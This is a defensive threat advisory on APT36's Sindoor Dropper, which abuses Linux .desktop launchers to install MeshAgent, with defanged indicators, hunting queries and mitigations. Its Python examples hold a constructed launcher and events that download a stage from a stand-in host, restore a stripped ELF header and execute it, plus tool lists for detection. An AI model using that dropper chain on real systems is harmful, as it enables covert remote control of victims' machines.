Sindoor Dropper Phishing Exploits Linux Desktop Files for Persistent Remote Control

Threat Group: Transparent Tribe / APT36 / Mythic Leopard / G0134
Threat Type: Targeted phishing dropper, Linux desktop shortcut abuse, remote administration tool deployment, cyber espionage
Exploited Vulnerabilities: No public CVE exploitation confirmed. Abuse of Linux .desktop launcher behaviour, user execution, weak attachment controls, and trusted cloud storage delivery.
Malware Used: Sindoor Dropper (Go based multi stage dropper), MeshAgent remote administration agent as the final payload.
Threat Score: 🔴 High (7.9/10) – Full remote control on Linux workstations through multi stage obfuscation, anti analysis, and legitimate admin tool abuse; credible targeting of government and defence networks.
Last Threat Observation: 2 September 2025


Overview

A sophisticated cyber espionage campaign designated Sindoor Dropper is actively targeting Indian organisations. Attribution points with high confidence to APT36, also known as Transparent Tribe. The operation marks a strategic shift: rather than Windows centric chains, the operators now target Linux workstations. Initial access arrives as a weaponised .desktop file delivered by spear phishing. The launcher opens a decoy PDF while starting a multi stage chain that restores a corrupted decryptor, decrypts a downloader, performs anti virtualisation checks, and finally deploys MeshAgent for full remote control via WebSocket over TLS. The abuse of a legitimate administration agent complicates detection and response. The campaign uses lures aligned to current events to increase click through and trust.

Key Details

Delivery Method: Spear phishing ZIPs contain a .desktop launcher named to mimic a PDF. On double click the launcher opens a benign PDF from trusted cloud storage while background commands fetch and execute staged components.
Target: Government and defence entities that use BOSS Linux and other Linux desktops, with potential spill over to education and adjacent contractors.
Functions:
• Initial access through user execution of a disguised .desktop launcher
• Multi stage download, decryption, and execution of Go based components
• Anti virtualisation and sandbox checks prior to final payload
• Deployment of MeshAgent for remote command execution and file transfer
• Persistence through autostart entries and scheduled tasks or services
• Encrypted WebSocket based command and control

Obfuscation: The first stage decryptor is a Go binary packed with UPX whose ELF magic bytes are intentionally stripped to evade static scanning on cloud platforms. The .desktop launcher restores those bytes at runtime using printf and dd. Strings across stages are obfuscated using Base64 and DES CBC. The chain enforces a minimum uptime and checks vendor and MAC address artefacts linked to virtual machines.

Attack Vectors

The campaign abuses the Linux .desktop mechanism. The launcher’s Exec line chains shell commands that write helpers to disk, restore headers, decrypt the next stage with a hard coded password, and remove artefacts. Successive stages repeat this pattern until MeshAgent is written and started. Persistence is achieved by writing entries into user autostart paths or by creating cron or systemd tasks. Traffic blends in by using WebSockets over TLS to dynamic DNS backed domains that resolve to cloud infrastructure.
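As an added example (not from the original advisory or any of its sources), a small Python scanner that applies the inspection the mitigation guidance describes to the contents of a .desktop file: it parses the [Desktop Entry] section and flags the document masquerade, a chained shell command in Exec, staging tools, and the printf based ELF header restoration. Both launcher texts, the domains and the paths are constructed for the example.

```python
import configparser
import re

# Staging tools the launcher chain relies on, plus common hex/base64 helpers.
SUSPICIOUS_TOOLS = ("curl", "wget", "dd", "chmod", "xxd", "base64")
ELF_RESTORE = re.compile(r"printf\s+['\"]?\\x7[fF]ELF")


def scan_desktop_entry(text: str) -> list:
    """Return human-readable findings for the contents of one .desktop file."""
    cfg = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cfg.read_string(text)
    except configparser.Error:
        return ["not a parseable desktop entry"]
    if "Desktop Entry" not in cfg:
        return ["no [Desktop Entry] header"]
    entry = cfg["Desktop Entry"]
    exec_line, name, icon = entry.get("Exec", ""), entry.get("Name", ""), entry.get("Icon", "")
    findings = []
    # The lure: a launcher that names itself like a document and borrows a PDF icon.
    if name.lower().endswith(".pdf") or "pdf" in icon.lower():
        findings.append("launcher masquerades as a PDF")
    # Exec normally names one program; a shell with chained commands is the dropper pattern.
    if re.search(r"\b(sh|bash)\s+-c\b", exec_line) and re.search(r"[;&|]", exec_line):
        findings.append("Exec chains shell commands")
    tools = sorted(t for t in SUSPICIOUS_TOOLS if re.search(rf"\b{t}\b", exec_line))
    if tools:
        findings.append("Exec invokes " + ", ".join(tools))
    # printf of the ELF magic into a file: restoring stripped headers before execution.
    if ELF_RESTORE.search(exec_line):
        findings.append("Exec restores a stripped ELF header")
    return findings


# Constructed samples for this example; neither is a real campaign file.
SUSPICIOUS_LAUNCHER = r"""[Desktop Entry]
Type=Application
Name=Meeting_Notice.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open https://drive.example.invalid/decoy.pdf; curl -s https://drive.example.invalid/s1 -o /tmp/s1; printf '\x7fELF' | dd of=/tmp/s1 conv=notrunc; chmod +x /tmp/s1; /tmp/s1"
"""

BENIGN_LAUNCHER = """[Desktop Entry]
Type=Application
Name=Text Editor
Exec=gedit %U
Icon=org.gnome.gedit
"""
```

Run it over the Downloads directory of a user who reported a suspicious archive; a launcher with more than one finding is worth pulling for analysis even if the EDR did not fire.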

MITRE ATT&CK Mapping

Initial Access: T1566.001 Spearphishing Attachment
User Execution: T1204.002 Malicious file execution
Execution: T1059 Command and scripting interpreter
Persistence: T1219 Remote access software
Defense Evasion: T1027 Obfuscated files or information; T1027.002 Software packing
Masquerading: T1036.008 Masquerade as a document and official domain
Virtualisation/Sandbox Evasion: T1497.001 Environment checks
Deobfuscate/Decode: T1140 Stage decryption
Command and Control: T1071.001 Application layer protocol (WebSocket over TLS); T1568.002 Dynamic resolution
Discovery: T1082 System information discovery

Known Indicators of Compromise (IoCs)

MD5 File Hashes

  • 8a7ac7c3511a452198e08eb68c5f8948

SHA1 File Hashes


SHA256 File Hashes


URLs

  • hxxp://boss-servers[.]gov[.]in[.]indianbosssystems[.]ddns[.]net:443/agent[.]ashx

Hostnames

  • boss-servers[.]gov[.]in[.]indianbosssystems[.]ddns[.]net
  • indianbosssystems[.]ddns[.]net

Detection and Hunting Aids

Elastic style
• .desktop execution with suspicious tooling:
event.category:process AND process.command_line:("*.desktop" AND (curl OR wget OR dd OR chmod OR xxd))
• Header restoration behaviour:
process.command_line:("printf \\x7FELF" AND dd AND mayuw)
• MeshAgent beacon:
url.path:"/agent.ashx" AND destination.port:443 AND destination.domain:*ddns.net

Splunk style
• Suspicious launcher chain:
index=edr sourcetype=linux:process_exec (process="*.desktop" (curl OR wget OR xxd OR dd OR chmod)) | stats count by host user parent_process process
• MeshAgent C2:
index=proxy OR index=fw uri_path="/agent.ashx" dest_port=443 dest_host="*.ddns.net" | stats values(src_ip) values(user) by dest_host

Sigma like logic
• Title: Linux desktop launcher abuses cloud decoy and staged decryptors
Selection: Exec contains curl OR wget OR xxd OR dd piping into chmod or dd. PDF opened by firefox within 10 seconds of launcher event.
Condition: selection within a short window
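The Elastic, Splunk and Sigma like logic above, carried through as an added Python example over constructed process and network events (not from the original advisory); hostnames, domains and command lines are made up, and the event shape is a simplified ECS like dictionary rather than any product's native schema.

```python
import re
from datetime import datetime

TOOLS = ("curl", "wget", "dd", "chmod", "xxd")
ELF_RESTORE = re.compile(r"printf\s+['\"]?\\x7[fF]ELF.*\bdd\b")
# Constructed telemetry in a simplified ECS-like shape; hosts, domains and command lines are made up.
EVENTS = [
    {"ts": "2025-09-02T09:00:00", "host": "ws1", "category": "process", "parent": "Notice.pdf.desktop",
     "command_line": "sh -c \"curl -s https://drive.example.invalid/s1 -o /tmp/s1; "
                     "printf '\\x7fELF' | dd of=/tmp/s1 conv=notrunc; chmod +x /tmp/s1\""},
    {"ts": "2025-09-02T09:00:04", "host": "ws1", "category": "process", "parent": "sh",
     "command_line": "firefox https://drive.example.invalid/decoy.pdf"},
    {"ts": "2025-09-02T09:00:31", "host": "ws1", "category": "network",
     "url_path": "/agent.ashx", "dest_port": 443, "dest_domain": "updates-example.ddns.net"},
    {"ts": "2025-09-02T09:05:00", "host": "ws2", "category": "process", "parent": "bash",
     "command_line": "dd if=/dev/zero of=/tmp/fill bs=1M count=10"},  # legitimate dd use, no launcher
]

def is_launcher_chain(ev):
    """Elastic/Splunk logic: a .desktop context plus staging tooling in the command line."""
    cl = ev.get("command_line", "")
    in_desktop = ".desktop" in cl or ".desktop" in ev.get("parent", "")
    return ev["category"] == "process" and in_desktop and any(re.search(rf"\b{t}\b", cl) for t in TOOLS)

def is_header_restore(ev):
    """printf of the ELF magic piped into dd: the stripped-header restoration step."""
    return ev["category"] == "process" and bool(ELF_RESTORE.search(ev.get("command_line", "")))

def is_meshagent_beacon(ev):
    """MeshAgent WebSocket endpoint on 443 towards a dynamic DNS domain."""
    return (ev["category"] == "network" and ev.get("url_path") == "/agent.ashx"
            and ev.get("dest_port") == 443 and ev.get("dest_domain", "").endswith(".ddns.net"))

def decoy_within(events, seconds=10):
    """Sigma-like correlation: launcher chain, then a browser opening a PDF on the same host."""
    hits = []
    for launch in filter(is_launcher_chain, events):
        t0 = datetime.fromisoformat(launch["ts"])
        for e in events:
            cl, delta = e.get("command_line", ""), (datetime.fromisoformat(e["ts"]) - t0).total_seconds()
            if e["host"] == launch["host"] and 0 < delta <= seconds and "firefox" in cl and ".pdf" in cl:
                hits.append((launch["host"], e["ts"]))
    return hits

def hunt(events):
    checks = {"launcher_chain": is_launcher_chain, "header_restore": is_header_restore, "meshagent_beacon": is_meshagent_beacon}
    result = {name: sorted({e["host"] for e in events if fn(e)}) for name, fn in checks.items()}
    result["decoy_correlated"] = sorted({h for h, _ in decoy_within(events)})
    return result
```

The benign dd event on ws2 shows why the launcher context matters: the tool names alone are too noisy on a Linux fleet, and the .desktop parent plus the decoy correlation are what make the hit actionable.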


Mitigation and Prevention

User Awareness
• Teach Linux users that .desktop files can execute commands. A PDF icon is not proof of safety. Encourage use of a text editor to inspect for [Desktop Entry] headers and suspicious Exec lines.
• Promote reporting of emails that reference current events and include archives with a single .desktop file.

Email Filtering
• Quarantine .desktop files inside archives for non developer groups. Flag ZIPs with a single .desktop that mimics a PDF name.
• Expand and detonate cloud storage links at the email boundary. Block downloads that deliver executable content as documents.

Endpoint Protection and Hardening
• Require explicit trust before GNOME or KDE runs a downloaded .desktop file. Ensure downloaded launchers are non executable until attributes are changed.
• Deploy EDR for Linux workstations. Alert on .desktop execution from user writable paths that invoke curl, wget, xxd, dd, chmod.
• Detect UPX packed Go binaries written to /tmp that run soon after a .desktop launch.
• Maintain allow lists for remote administration tools. If MeshCentral is not approved, alert or block MeshAgent binaries and their C2 patterns.
• Use AppArmor or SELinux to constrain user applications.

Identity and Access
• Enforce multifactor authentication for email and admin access. Remove unnecessary sudo from user accounts. Monitor for unusual sign ins that align with endpoint anomalies.


Response Guidance

• If a launcher is found, isolate the host. Capture volatile artefacts. Collect the .desktop file and helpers from temp paths. Dump active processes and open network connections. Preserve browser history around execution time.
• If MeshAgent exists, extract its configuration to enumerate other agents and controlling servers. Rotate credentials used on the host. Review for lateral movement.
• Hunt for siblings under the same dynamic DNS and for other WebSocket sessions to unusual hosts.


Risk Assessment

Impact: High. Successful infection gives the operator remote interactive access to Linux workstations in sensitive networks with a path to credential theft, lateral movement, and data exfiltration.
Likelihood: Moderate to High in environments with Linux desktops and weak attachment controls.
Exposure: Elevated for Indian government, defence, and affiliated contractors and education. Elevated for mixed OS fleets with fewer controls on Linux.
Compensating Factors: Strong email filtering, launcher handling rules, and Linux EDR coverage reduce risk.


Conclusion

Sindoor Dropper shows the continued evolution of APT36 and a clear intent to compromise Linux desktops through believable lures and native launcher abuse. The chain blends social engineering, staged decryption, anti analysis, and a legitimate administration agent to maximise access and minimise detection. Organisations that harden Linux workstation execution paths, block launcher content at the email layer, and monitor for WebSocket beacons to dynamic DNS infrastructure are better positioned to detect and contain this threat.


Podcast Section

No dedicated podcast episode focused on this campaign was identified at this time. Use general coverage of APT36 and Linux malware trends from reputable sources for situational awareness.


Sources

• Nextron Systems – Sindoor Dropper New Phishing Campaign
• The Hacker News – Transparent Tribe Targets Indian Govt With Weaponized Desktop Shortcuts via Phishing
• BleepingComputer – APT36 hackers abuse Linux .desktop files to install malware in new attacks
• CYFIRMA – APT36 Targets Indian BOSS Linux Systems with Weaponized AutoStart Files